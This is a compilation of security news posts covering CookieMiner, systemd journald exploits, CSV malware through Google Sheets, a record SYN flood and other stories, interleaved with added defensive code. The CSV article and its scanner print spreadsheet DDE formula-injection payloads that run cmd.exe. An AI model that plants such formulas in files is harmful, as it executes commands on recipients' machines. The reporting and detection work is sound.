Nathaniel Gleicher, head of cybersecurity policy at Facebook, explained that the pages were part of a campaign to promote Iranian interests in dozens of countries, with the threat actors posing as residents of those nations.

Facebook continues its efforts to prevent manipulation of its platform for fraudulent activities.

“We are constantly working to detect and stop this type of activity because we don’t want our services to be used to manipulate people,” Gleicher declared.

“We’re taking down these pages, groups and accounts based on their behavior, not the content they post. In this case, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”

The threat actors behind the campaign posed as locals and posted news stories on current events. The accounts discussed topics of interest to Iran, such as Israel-Palestine relations and the conflicts in Syria and Yemen.

“This morning we removed 783 Pages, groups and accounts for engaging in coordinated inauthentic behavior tied to Iran. There were multiple sets of activity, each localized for a specific country or region, including Afghanistan, Albania, Algeria, Bahrain, Egypt, France, Germany, India, Indonesia, Iran, Iraq, Israel, Libya, Mexico, Morocco, Pakistan, Qatar, Saudi Arabia, Serbia, South Africa, Spain, Sudan, Syria, Tunisia, US, and Yemen.” wrote Nathaniel Gleicher.

“The Page administrators and account owners typically represented themselves as locals, often using fake accounts, and posted news stories on current events. This included commentary that repurposed Iranian state media’s reporting on topics like Israel-Palestine relations and the conflicts in Syria and Yemen, including the role of the US, Saudi Arabia, and Russia.”

In some cases, the activity of the fake accounts dates back to 2010.

Facebook pointed out that although the threat actors attempted to hide their identities, a manual review of the activity associated with these accounts allowed it to identify the coordinated inauthentic behavior originating from Iran.

The campaign, active as early as 2010, involved 262 pages, 356 accounts and three groups on Facebook, as well as 162 accounts on Instagram.

According to Facebook, about 2 million accounts followed at least one of the above pages, about 1,600 accounts joined at least one of the groups, and more than 254,000 accounts followed at least one of these Instagram accounts.

The social network giant reported that the operators spent less than $30,000 on ads on Facebook and Instagram, paid for primarily in US dollars, UK pounds, Canadian dollars and euros.

“We identified some of these accounts through our continued investigation into Iranian coordinated inauthentic behavior we found and removed last year.” concludes Gleicher.

“Our investigation was aided by open source reporting and information provided to us by our industry peers. We have shared information about our investigation with US law enforcement, the US Congress, and policymakers in impacted countries.”

Pierluigi Paganini

(SecurityAffairs – Facebook, manipulation campaign)

The post Facebook dismantled a vast manipulation campaign tied to Iran appeared first on Security Affairs.

Security Affairs: CookieMiner Mac Malware steals browser cookies and sensitive Data

Palo Alto Networks discovered a piece of Mac malware dubbed CookieMiner that targets browser cookies associated with cryptocurrency exchanges and wallet service websites.

Researchers from Palo Alto Networks discovered a new piece of Mac malware dubbed CookieMiner that steals browser cookies associated with cryptocurrency exchanges and wallet service websites along with other sensitive data.

The malware targets cookies associated with cryptocurrency exchanges such as Binance, Coinbase, Poloniex, Bittrex, Bitstamp and MyEtherWallet, and it also steals the cookies of any website whose domain name contains “blockchain”. CookieMiner uses a Python script named “harmlesslittlecode.py” to steal saved login credentials and credit card information from Chrome.

CookieMiner is based on OSX.DarthMiner, a malware discovered by experts at Malwarebytes in December. It steals browser cookies from Chrome and Safari along with other sensitive data: user credentials and saved credit card details stored in Chrome, iPhone text messages from backups on the Mac, and cryptocurrency wallet data and keys.

“This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims.” reads the analysis published by PaloAlto Networks.

“It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites.”

Crooks aim to empty the victim’s exchange account or wallet by combining stolen login credentials, web cookies and SMS data.

Experts believe the threat actors could bypass multi-factor authentication on the sites for which they manage to steal the associated information.
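Why a stolen cookie is enough: the site has already checked the password and the second factor when it issued the session, so every later request that presents the cookie is trusted without another look. The added example below (written for this page, not code from Palo Alto Networks, CookieMiner or any exchange) models that in a few dozen lines and shows two mitigations a service can apply: binding the session to the client that logged in and requiring a fresh one-time code for withdrawals. The exchange, the account, the TOTP seed and the client fingerprints are all constructed.

```python
"""Added model of session-cookie replay against an MFA-protected account.
Constructed illustration, not the code of any real exchange or of
CookieMiner: the user, seed, balances and client fingerprints are made up."""
import hashlib
import hmac
import secrets
import struct


def totp(secret: bytes, now: float, step: int = 30) -> str:
    """RFC 6238-style 6-digit code: HMAC-SHA1 over the 30-second counter."""
    counter = struct.pack(">Q", int(now // step))
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % 1_000_000
    return f"{code:06d}"


class Exchange:
    """Toy account service. With both flags off it reproduces the weak
    pattern: MFA is verified once at login and the cookie alone authorises
    every later request, which is exactly what a cookie thief needs."""

    def __init__(self, bind_sessions: bool = False, step_up: bool = False):
        self.users, self.sessions = {}, {}
        self.bind_sessions = bind_sessions   # tie the cookie to the logging-in client
        self.step_up = step_up               # demand a fresh OTP on withdrawals

    @staticmethod
    def _hash(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, user: str, password: str, totp_secret: bytes, balance: float):
        salt = secrets.token_bytes(16)
        self.users[user] = {"salt": salt, "pw": self._hash(password, salt),
                            "secret": totp_secret, "balance": balance}

    def login(self, user, password, otp, client_fp, now):
        u = self.users.get(user)
        if u is None or not hmac.compare_digest(self._hash(password, u["salt"]), u["pw"]):
            return None
        if not hmac.compare_digest(otp, totp(u["secret"], now)):
            return None
        cookie = secrets.token_urlsafe(32)          # this is what CookieMiner steals
        self.sessions[cookie] = {"user": user, "fp": client_fp}
        return cookie

    def withdraw(self, cookie, amount, client_fp, now, otp=None) -> bool:
        s = self.sessions.get(cookie)
        if s is None:
            return False
        if self.bind_sessions and not hmac.compare_digest(s["fp"], client_fp):
            return False                      # cookie presented from another client
        acct = self.users[s["user"]]
        if self.step_up and (otp is None or not hmac.compare_digest(otp, totp(acct["secret"], now))):
            return False                      # sensitive action: prove the factor again
        if amount > acct["balance"]:
            return False
        acct["balance"] -= amount
        return True


def demo():
    """Returns (replay works on weak site, replay blocked on hardened site, owner still works)."""
    seed, t0 = b"constructed-totp-seed", 1_700_000_000.0
    weak = Exchange()
    weak.register("alice", "correct horse battery", seed, balance=10.0)
    cookie = weak.login("alice", "correct horse battery", totp(seed, t0), "victim-mac", t0)
    # Theft scenario: the same cookie replayed ten minutes later from another host.
    replay_works = weak.withdraw(cookie, 5.0, "attacker-box", t0 + 600)

    hard = Exchange(bind_sessions=True, step_up=True)
    hard.register("alice", "correct horse battery", seed, balance=10.0)
    cookie = hard.login("alice", "correct horse battery", totp(seed, t0), "victim-mac", t0)
    replay_blocked = not hard.withdraw(cookie, 5.0, "attacker-box", t0 + 600, otp=totp(seed, t0 + 600))
    owner_ok = hard.withdraw(cookie, 5.0, "victim-mac", t0 + 600, otp=totp(seed, t0 + 600))
    return replay_works, replay_blocked, owner_ok


if __name__ == "__main__":
    print(demo())
```

Client binding on its own is a partial control: the malware described here also exfiltrates SMS messages, so an attacker holding the password and an SMS code can simply log in afresh. Step-up verification with an app- or hardware-based factor, short session lifetimes and revoking all sessions on a password change are the stronger companions.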

CookieMiner configures the compromised system to run coin-mining software that looks like an XMRig-type miner but actually mines Koto, a less popular cryptocurrency associated with Japan.

Like DarthMiner, the malware uses the EmPyre backdoor as a post-exploitation agent; it checks whether the Little Snitch firewall is running on the target host and aborts the installation if it is.

“The malware ‘CookieMiner’ is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If attackers have all the needed information for the authentication process, the multi-factor authentication may be defeated.” Palo Alto Networks concludes.

“Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage.”

Further details, including IoCs, are reported in the analysis published by Palo Alto Networks.

Pierluigi Paganini

(SecurityAffairs – CookieMiner, cryptocurrency malware)

The post CookieMiner Mac Malware steals browser cookies and sensitive Data appeared first on Security Affairs.

Airbus data breach exposes some employees’data

The European airplane manufacturer Airbus announced to have suffered a data breach that exposed some employees’ data.

The European airplane manufacturer Airbus announced that it has suffered a data breach: hackers broke into the information systems of its “Commercial Aircraft business” and gained access to some of its employees’ personal information.

“Airbus SE (stock exchange symbol: AIR) detected a cyber incident on Airbus “Commercial Aircraft business” information systems, which resulted in unauthorised access to data. There is no impact on Airbus’ commercial operations.” reads the statement published by the company.

According to the European aerospace corporation, the intrusion happened earlier this month; the good news is that the security breach affected neither its commercial operations nor aircraft production.

The company did not share further details on the hack; it confirmed that investigations are ongoing to “understand if any specific data was targeted.”

However, the data accessed by the hackers is mostly professional contact and IT identification details of some Airbus employees in Europe.

“Investigations are ongoing to understand if any specific data was targeted; however we do know some personal data was accessed,” continues the statement.

Airbus declared to have begun taking immediate and appropriate actions to reinforce existing security measures. and to mitigate the potential impact of the data breach.

The airplane maker has also instructed its employees to “take all necessary precautions going forward,” to strengthen their security defenses.

The company reported the incident to the regulatory authorities and the data protection authorities pursuant to the European Union’s GDPR (General Data Protection Regulation) rules. It advised its employees to remain vigilant and to take all necessary precautions going forward.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Airbus data breach exposes some employees’ data appeared first on Security Affairs.


Researchers published the PoC exploit code for Linux SystemD bugs

Security researchers at the security firm Capsule8 have published proof-of-concept exploit code for the systemd vulnerabilities disclosed by Qualys in January.

Earlier this month, security firm Qualys disclosed three flaws (CVE-2018-16864, CVE-2018-16865 and CVE-2018-16866) in a component of systemd, the software suite that provides fundamental building blocks for a Linux operating system and is used in most major Linux distributions.

The flaws reside in systemd-journald, the systemd service that collects and stores logging data.

CVE-2018-16864 and CVE-2018-16865 are memory corruption vulnerabilities, while CVE-2018-16866 is an out-of-bounds read that can lead to an information leak. Qualys researchers were working on an exploit for another Linux vulnerability when they noticed that passing several megabytes of command-line arguments to a program that calls syslog() crashed systemd-journald.

The experts developed a PoC exploit chaining CVE-2018-16865 and CVE-2018-16866 that obtains a local root shell in 10 minutes on i386 and 70 minutes on amd64, on average.


In an attack against a Linux box, CVE-2018-16864 can be exploited by malicious code or by an ill-intentioned logged-in user to crash and hijack the systemd-journald service and gain elevated privileges. Chaining CVE-2018-16865 with CVE-2018-16866 likewise allows a local attacker to crash or hijack the root-privileged journal service.

If you haven’t already applied the patches to your system, you now have a good reason to do so, because experts at security firm Capsule8 have published exploit code for the flaws.

The published code was deliberately neutered (it works only with ASLR disabled, and key details were withheld), so it shouldn’t be usable for mass attacks in the wild. However, others may devise ways to bypass the remaining protections of Linux installs.

Nick Gregory, security researcher at Capsule8, revealed in a blog post that his company has developed a proof-of-concept exploit for the above vulnerabilities.

“As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification.” reads the post published by Gregory.

“There are some interesting aspects that were not covered by Qualys’ initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory,”

The Python exploit script written by the expert targets the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image with address space layout randomization (ASLR) disabled, an uncommon condition in production environments.

The script triggers CVE-2018-16865 through journald’s own use of alloca(), which allocates a caller-specified number of bytes in the caller’s stack frame: because that size is derived from attacker-controlled input, the attacker can move the stack pointer by an amount of their choosing.

“Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point to libc’s BSS memory region, and then surgically overwrite the __free_hook function pointer with a pointer to system.” continues the researcher.

“This grants us arbitrary command execution upon the freeing of memory with content we control.”
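As an added illustration written for this article (it is neither Capsule8’s exploit nor systemd’s own code), the C program below models the alloca() pattern at the root of CVE-2018-16865 beside a hardened form. Everything in it is this example’s assumption: the function names, the constructed sample entry, the 1024-field cap (ENTRY_FIELD_COUNT_MAX) and the 4 KiB stack threshold (ALLOCA_MAX_BYTES); systemd’s own fixes went in the same general direction, capping the number of fields and keeping large buffers off the stack, but the numbers here are not theirs.

```c
/*
 * Added illustration for this article: a simplified model of the alloca()
 * pattern behind CVE-2018-16865, not systemd's own code. A journal entry is a
 * list of "KEY=value" fields and journald builds a struct iovec array for
 * them; when the field count comes straight from an unprivileged client and
 * is passed to alloca(), the stack pointer moves by an attacker-chosen amount.
 */
#include <alloca.h>
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/uio.h>

/* Assumed limits for this example (systemd's fixes bound the field count in
 * the same spirit; the exact numbers here are this example's own). */
#define ENTRY_FIELD_COUNT_MAX 1024
#define ALLOCA_MAX_BYTES      4096

/* Constructed sample entry, not a captured journald message. */
static const char *const sample_entry[] = {
    "MESSAGE=hello", "PRIORITY=6", "SYSLOG_IDENTIFIER=demo"
};
#define SAMPLE_ENTRY_FIELDS (sizeof sample_entry / sizeof sample_entry[0])

/* Vulnerable pattern: n is attacker controlled and alloca() cannot fail, so a
 * huge n silently moves the stack pointer outside the stack. Only call this
 * with a small n; with a large one it corrupts memory or crashes. */
size_t vulnerable_total_len(const char *const *fields, size_t n) {
    struct iovec *iov = alloca(n * sizeof(struct iovec)); /* unbounded */
    size_t total = 0;
    for (size_t i = 0; i < n; i++) {
        iov[i].iov_base = (void *)fields[i];
        iov[i].iov_len = strlen(fields[i]);
        total += iov[i].iov_len;
    }
    return total;
}

/* Hardened pattern: reject an oversized count before allocating anything, and
 * put larger arrays on the heap, where a failed allocation is reported instead
 * of silently corrupting memory. Returns the total, or -1 with errno set. */
long hardened_total_len(const char *const *fields, size_t n) {
    struct iovec *iov;
    int on_heap;
    if (n > ENTRY_FIELD_COUNT_MAX) {
        errno = E2BIG;                         /* client sent too many fields */
        return -1;
    }
    size_t bytes = n * sizeof(struct iovec);   /* cannot overflow: n is bounded */
    on_heap = bytes > ALLOCA_MAX_BYTES;
    if (on_heap) {
        iov = malloc(bytes);
        if (iov == NULL) {
            errno = ENOMEM;
            return -1;
        }
    } else {
        iov = alloca(bytes);                   /* small and bounded: stack is fine */
    }
    size_t total = 0;
    for (size_t i = 0; i < n; i++) {
        iov[i].iov_base = (void *)fields[i];
        iov[i].iov_len = strlen(fields[i]);
        total += iov[i].iov_len;
    }
    if (on_heap)
        free(iov);
    return (long)total;
}

/* Feeds n copies of one constructed field through the hardened path so the
 * heap branch can be exercised without a large literal array. */
long hardened_total_len_repeated(const char *field, size_t n) {
    const char **fields = calloc(n ? n : 1, sizeof *fields);
    if (fields == NULL)
        return -1;
    for (size_t i = 0; i < n; i++)
        fields[i] = field;
    long r = hardened_total_len(fields, n);
    free(fields);
    return r;
}

int main(void) {
    printf("small entry, vulnerable path: %zu bytes\n",
           vulnerable_total_len(sample_entry, SAMPLE_ENTRY_FIELDS));
    printf("small entry, hardened path:   %ld bytes\n",
           hardened_total_len(sample_entry, SAMPLE_ENTRY_FIELDS));
    printf("512 fields (heap path):       %ld bytes\n",
           hardened_total_len_repeated("K=v", 512));
    long r = hardened_total_len(sample_entry, (size_t)1 << 20);
    printf("1<<20 fields, hardened path:  %ld (%s)\n", r, strerror(errno));
    return 0;
}
```

The hardened version never lets the untrusted count reach alloca(): the bound check comes first, so the multiplication cannot overflow, and anything beyond a few kilobytes goes through malloc(), whose failure is a return value rather than a silently relocated stack pointer.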

Exploitation requires controlling all 64 bits of the hash value that journald computes and uses in the memory write, and computing a preimage for that hash is hard.

Although tools exist that can compute exact preimages in a few seconds, for the PoC the experts used a hash precomputed for the Vagrant image.

Using the same PoC against other Linux distributions requires computing the hash for that target; Capsule8 will detail how in a follow-up post.

“As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had a chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value.” concludes the expert.

“We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies,”

Pierluigi Paganini

(SecurityAffairs – Linux, systemd )

The post Researchers published the PoC exploit code for Linux SystemD bugs appeared first on Security Affairs.

Exclusive: spreading CSV Malware via Google Sheets

Cyber security expert Marco Ramilli, founder of Yoroi, discovered a way to spread CSV malware via Google Sheets… but Big G says it is an intended behavior.

A .CSV file can be a malware carrier and, if interpreted by Microsoft Excel, it can become a malware executor! When I personally saw this technique back in 2017 (please take a look here, here and here) I was fascinated. A simple and sweet textual file forcing the behaviour of powerful and protected machines: no macros, no Visual Basic, no exploits were involved. Indeed, if you have ever installed Microsoft Excel on your Windows box you probably know that when you click on a common .CSV file, MS Excel starts up. It opens the selected .CSV file and interprets the cell contents. But what if an attacker writes malicious content into one or more cells? I had personally never received and/or analysed such a dropper until a few days ago, when one appeared in my spam-box; it quickly became a mandatory analysis for my personal experience :P.

Dropper .CSV

A series of empty fields precedes a final, fake formula that pipes a command into cmd.exe, which is then spawned. Using the bitsadmin technique, the attacker downloads a file called now.exe and stores it in a temporary system folder for later execution. In this specific case the downloaded malware happens to be a variant of the NanoCore RAT, but this is not my point for today. If you are interested in the malware analysis of now.exe, please read here.

At that time the attacker abused the Dynamic Data Exchange (DDE) protocol for interprocess communication, which is supported by Microsoft Excel, LibreOffice and Apache OpenOffice. For example, the following formula on OpenOffice will run calc.exe (CVE-2014-3524).

=DDE("cmd";"/C calc";"__DdeLink_60_870516294")

On Microsoft Excel the same result can be reached by introducing the following formula:

=cmd|' /C calc'!A0

While OpenOffice and LibreOffice patched this vulnerability in OpenOffice 4.1.1 and LibreOffice 4.3.1 respectively, Microsoft decided to allow this behaviour, introducing two user “warnings” instead.
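As an added example written for this article (not Marco Ramilli’s or Yoroi’s code), the C program below scans a CSV line for the formula-injection pattern described above. It parses the cells (double-quoted fields and "" escapes as in RFC 4180, comma delimiter assumed), classifies the ones a spreadsheet would evaluate rather than display, singles out the two DDE syntaxes shown above, and neutralises a cell by prefixing an apostrophe, which the OWASP CSV-injection guidance recommends so that the application treats the cell as text. The sample lines are constructed, and the rule that a sign followed only by digits is an ordinary number is this example’s own choice.

```c
/* Added example for this article (not the original post's code): CSV cell
 * scanner for the formula-injection technique described above. */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CELL_SAFE    0   /* displayed as text or number */
#define CELL_FORMULA 1   /* evaluated by the spreadsheet */
#define CELL_DDE     2   /* formula using a DDE command syntax */

/* Copies the next cell of line (from *pos) into out, removing the quoting.
 * Returns false once the line is exhausted. Delimiter is assumed to be ','. */
bool csv_next_cell(const char *line, size_t *pos, char *out, size_t outsz) {
    size_t len = strlen(line), i = *pos, o = 0;
    if (i > len)
        return false;
    bool quoted = line[i] == '"';
    if (quoted)
        i++;
    while (i < len) {
        char c = line[i];
        if (quoted && c == '"') {
            if (line[i + 1] == '"') {
                i++;                    /* "" inside quotes is one literal quote */
            } else {
                quoted = false;         /* closing quote; expect the delimiter next */
                i++;
                continue;
            }
        } else if (!quoted && (c == ',' || c == '\r' || c == '\n')) {
            break;
        }
        if (o + 1 < outsz)
            out[o++] = c;
        i++;
    }
    out[o] = '\0';
    /* step over the delimiter; past the end, make the next call return false */
    *pos = (i < len && line[i] == ',') ? i + 1 : len + 1;
    return true;
}

/* Classifies one cell. A leading '=' or '@', or a '+'/'-' not followed by a
 * plain number, marks a formula; leading whitespace and control characters
 * are skipped because Excel ignores them. Inside formulas, Excel's
 * "app|topic!item" syntax and the DDE() function are reported as DDE. */
int csv_cell_threat(const char *cell) {
    const char *p = cell;
    while (*p && (isspace((unsigned char)*p) || iscntrl((unsigned char)*p)))
        p++;
    bool formula = (*p == '=' || *p == '@');
    if (*p == '+' || *p == '-') {
        const char *q = p + 1;          /* -5 and +3.25 are ordinary numbers */
        while (isdigit((unsigned char)*q) || *q == '.')
            q++;
        formula = (q == p + 1) || (*q != '\0');
    }
    if (!formula)
        return CELL_SAFE;
    if ((strchr(p, '|') && strchr(p, '!')) || strstr(p, "DDE("))
        return CELL_DDE;
    return CELL_FORMULA;
}

/* Writes a text-only copy of the cell: a leading apostrophe makes spreadsheets
 * display the content instead of evaluating it. Returns the length written,
 * or -1 when out is too small. */
int csv_neutralize_cell(const char *cell, char *out, size_t outsz) {
    size_t n = strlen(cell);
    if (n + 2 > outsz)
        return -1;
    out[0] = '\'';
    memcpy(out + 1, cell, n + 1);
    return (int)(n + 1);
}

/* Scans a whole line. Returns the number of formula cells (DDE ones included)
 * and stores the number of DDE cells in *dde_count when it is not NULL. */
int csv_count_threats(const char *line, int *dde_count) {
    char cell[1024];
    size_t pos = 0;
    int formulas = 0, dde = 0;
    while (csv_next_cell(line, &pos, cell, sizeof cell)) {
        int t = csv_cell_threat(cell);
        if (t != CELL_SAFE) formulas++;
        if (t == CELL_DDE) dde++;
    }
    if (dde_count)
        *dde_count = dde;
    return formulas;
}

int main(void) {
    /* Constructed lines modelled on the dropper described above, not the sample. */
    const char *lines[] = {
        "id,name,balance",
        "1,alice,-5",
        ",,,,=cmd|' /C calc'!A0",
        "\"=DDE(\"\"cmd\"\";\"\"/C calc\"\";\"\"__DdeLink_60_870516294\"\")\",x",
    };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        int dde = 0, f = csv_count_threats(lines[i], &dde);
        printf("line %zu: %d formula cell(s), %d via DDE\n", i + 1, f, dde);
    }
    return 0;
}
```

The parser matters as much as the classifier: the OpenOffice payload has to be double-quoted to survive as one CSV field, so a scanner that splits naively on commas would never see the `=DDE(` prefix. The sign rule is deliberately lenient toward negative numbers; a stricter deployment (an export filter rather than a mail-gateway triage tool) would neutralise every cell that starts with one of the four trigger characters.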

Microsoft Excel User Warnings before letting run DDE content

These warnings recommend that the user shouldn’t click if he does not trust the source of the file… here we go! What if you received this file from a Google spreadsheet? OK, maybe nobody in the cybersecurity community would trust a spreadsheet coming from a random Google Sheets user, but many people out there would trust Google Sheets without wondering who really sits behind the shared document.

Google Sheets spreading .CSV dropper

In 2019 the most interesting thing about this technique is its ability to bypass Google’s filters. By implementing the .csv dropper technique, an attacker could easily use Google Sheets as a malware vector. Although Google implements sophisticated anti-malware measures for Gmail and Google Drive to avoid malware spreading over its technologies (for example, Google scans files before they are uploaded to or downloaded from Drive, and blocks specific file types such as .exe, .dll and .zip in Gmail), this time it seems not to be as sensitive to the issue. Google has been alerted about it, but confirmed that it is actually an “Intended Behaviour”.

Google Ticket Changed on Intended Behaviour

Finally, an attacker could send a clean link over an instant messaging platform and/or email asking the victim to open a Google Sheets document, suggesting they open the spreadsheet locally because of “MS Excel compatibility issues”. If the victim downloads the sheet and opens it locally (with Microsoft Excel), the attacker might infect her box.

I really hope that Google will at least try to avoid being used as an attack vector, as it does with many other technologies, but in the meantime please be aware of this issue, and if you receive a link to a non-working Google Sheets document, please do not download it locally.

Further information, including IoCs, are reported in the blog post published by Marco Ramilli.

Pierluigi Paganini

(SecurityAffairs – Google Sheets, hacking)

The post Exclusive: spreading CSV Malware via Google Sheets appeared first on Security Affairs.

Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever

Imperva mitigated a SYN flood DDoS attack against one of its clients that exceeded 500 million packets per second, the largest ever observed by packet volume.

Earlier this month, the cyber security software and services company Imperva mitigated an attack against one of its clients that exceeded 500 million packets per second. This attack was a SYN flood DDoS and it is the largest DDoS attack by packet volume ever observed.


The attacker sent both a flood of normal SYN packets and a flood of large SYN packets, using two previously known tools.

The attacker used a highly randomized and likely spoofed set of source ports and addresses, and the large SYN packets were between 800 and 900 bytes each.

Normal SYN packets saturate the target’s resources, while the larger packets saturate the network.

According to the experts, the two tools used in the attack were developed by two different individuals, and the attacker combined them in the January attack.

“When we investigated, we realized the attack wasn’t generated using new tools, but two common older ones: one for the syn attack and the other for the large syn attack. Although both tools try to mimic legitimate operating systems, there are some odd, suspicion-raising differences.” reads the report published by Imperva.

“One possible hypothesis is that these tools, although used in the same attack, were written by two different individuals and then combined to form an arsenal and launch the most intensive DDoS attack against Network infrastructure in the history of the Internet. “

Experts pointed out that the most important factor in evaluating the magnitude of a DDoS attack is the number of packets per second (PPS).

Mitigating DDoS attacks with a very high PPS rate is hard because of the processing power required to evaluate every single packet.

Network appliances mostly evaluate the headers of every packet and only in a limited number of cases inspect the full payload. Their limiting factor is the packet rate, not the packet size.

Until now, the 2018 GitHub DDoS attack, which peaked at 1.35 Tbps, was considered the largest-ever distributed denial of service. Its traffic was mainly composed of large packets sent from the same port on many different servers, at a relatively low packet rate of around 129.6 million PPS.

The attack observed by Imperva this month was nearly four times larger in terms of packets per second, with packets sent from random sources.

The good news is that high PPS attacks are difficult to generate because they require more computational resources.
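As an added example written for this article (not Imperva’s code or detection logic), the C program below runs a first-pass SYN-flood check over constructed packet summaries, measuring what the text singles out: packets per second separately from bits per second, the share of SYN-only packets, how many of those carry an unusually large payload (a bare SYN is a few dozen bytes on the wire, so 800-900 byte SYNs stand out), and how scattered the source addresses and ports are. The alert thresholds, the struct layout and both traffic samples are this example’s assumptions.

```c
/* Added example for this article, not Imperva's code: a first-pass SYN-flood
 * check over constructed packet summaries. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

#define TH_SYN 0x02
#define TH_PSH 0x08
#define TH_ACK 0x10

struct pkt {
    double ts;        /* arrival time in seconds */
    unsigned src;     /* source IPv4 address as a 32-bit integer */
    unsigned sport;   /* source port */
    unsigned flags;   /* TCP flags */
    unsigned len;     /* bytes on the wire */
};

struct flood_stats {
    double pps, mbps;       /* packets/s and megabits/s over the window */
    double syn_share;       /* SYN-without-ACK packets / all packets */
    double big_syn_share;   /* SYNs longer than 100 bytes / SYNs */
    double src_spread;      /* distinct (src, sport) pairs / packets */
};

/* Example thresholds (assumed); a real deployment tunes them per link. */
#define PPS_ALERT       100000.0
#define SYN_SHARE_ALERT 0.9
#define SPREAD_ALERT    0.8

/* Summarises a window of packets; false if the window is too short to rate. */
bool flood_stats_compute(const struct pkt *p, size_t n, struct flood_stats *s) {
    if (n < 2 || p[n - 1].ts <= p[0].ts)
        return false;
    double span = p[n - 1].ts - p[0].ts;
    unsigned long bytes = 0;
    size_t syn = 0, big = 0, distinct = 0;
    for (size_t i = 0; i < n; i++) {
        bytes += p[i].len;
        if ((p[i].flags & (TH_SYN | TH_ACK)) == TH_SYN) {
            syn++;
            if (p[i].len > 100)          /* a bare SYN is a few dozen bytes */
                big++;
        }
        bool seen = false;               /* O(n^2) is fine for a sample window */
        for (size_t j = 0; j < i && !seen; j++)
            seen = p[j].src == p[i].src && p[j].sport == p[i].sport;
        if (!seen)
            distinct++;
    }
    s->pps = n / span;
    s->mbps = bytes * 8.0 / span / 1e6;
    s->syn_share = (double)syn / n;
    s->big_syn_share = syn ? (double)big / syn : 0.0;
    s->src_spread = (double)distinct / n;
    return true;
}

/* Packet rate first, since that is what exhausts header-inspecting devices;
 * SYN share and source spread then separate a flood from a busy service. */
bool is_syn_flood(const struct flood_stats *s) {
    return s->pps >= PPS_ALERT && s->syn_share >= SYN_SHARE_ALERT &&
           s->src_spread >= SPREAD_ALERT;
}

/* Constructed flood: up to 200 large SYNs, one every 5 microseconds, from
 * sources and ports drawn from a fixed-seed LCG so they look spoofed. */
size_t sample_flood(struct pkt *out, size_t max) {
    unsigned x = 12345u;
    size_t n = max < 200 ? max : 200;
    for (size_t i = 0; i < n; i++) {
        x = x * 1103515245u + 12345u;
        out[i].ts = i * 5e-6;
        out[i].src = x;
        out[i].sport = (x >> 16) & 0xffffu;
        out[i].flags = TH_SYN;
        out[i].len = 800u + x % 101u;    /* 800..900 bytes, as in the report */
    }
    return n;
}

/* Constructed normal traffic: five clients, each a handshake plus one request,
 * spread over two seconds. */
size_t sample_normal(struct pkt *out, size_t max) {
    const unsigned flags[4] = { TH_SYN, TH_ACK, TH_PSH | TH_ACK, TH_ACK };
    const unsigned lens[4] = { 60, 52, 500, 52 };
    size_t n = 0;
    for (unsigned c = 0; c < 5 && n + 4 <= max; c++)
        for (unsigned k = 0; k < 4; k++, n++) {
            out[n].ts = 0.1 * n;
            out[n].src = 0x0a000001u + c;
            out[n].sport = 40000u + c;
            out[n].flags = flags[k];
            out[n].len = lens[k];
        }
    return n;
}

int main(void) {
    struct pkt win[256];
    struct flood_stats s;
    size_t (*samples[2])(struct pkt *, size_t) = { sample_flood, sample_normal };
    for (int i = 0; i < 2; i++) {
        size_t n = samples[i](win, 256);
        if (!flood_stats_compute(win, n, &s))
            continue;
        printf("%-7s %8.0f pps %8.1f Mbit/s syn %.2f big-syn %.2f spread %.2f -> %s\n",
               i ? "normal" : "flood", s.pps, s.mbps, s.syn_share, s.big_syn_share,
               s.src_spread, is_syn_flood(&s) ? "SYN flood" : "ok");
    }
    return 0;
}
```

The two rates are reported side by side on purpose: the constructed flood sample runs at roughly 200,000 packets per second but only around 1.4 Gbit/s, which is the point the article makes about the Imperva attack versus the GitHub one. The source-spread ratio is a cheap stand-in for the “highly randomized and likely spoofed” sources; in a real pipeline the distinct-source count would come from a sketch or hash set rather than the quadratic loop used here for a small window.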

Pierluigi Paganini

(SecurityAffairs – DDoS, hacking)

The post Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever appeared first on Security Affairs.

Skyscanner launches a public bug bounty program

The popular travel search website Skyscanner is launching a public bug bounty program and will pay up to $2,000 per vulnerability.

The travel search website Skyscanner announced a public bug bounty program that will pay up to $2,000 per vulnerability.

Skyscanner has been running a private bug bounty program that according to the company allowed it to discover and address over 200 flaws in its systems. Now Skyscanner is opening the bug bounty program to the public.

“For the past few years, we’ve run a successful private Bug Bounty program, and are excited to announce that we are now extending this to a public program, to further strengthen our security posture, improve our services, and most importantly, to keep our travellers safe when using Skyscanner.” reads the announcement of the bug bounty program published on Bugcrowd.

“We invite researchers to test the Skyscanner website and mobile apps in line with the process and principles set out in this brief.”


The bug bounty program covers the official skyscanner.net website, regional domains, the gateway.skyscanner.net API, both the iOS and Android apps, and the partnerportal.skyscanner.net website.

The company will pay for vulnerabilities affecting the profile, booking and partner portal sections.

Participants in the bug bounty program cannot access or modify travellers’ data without the explicit prior permission of the owner.

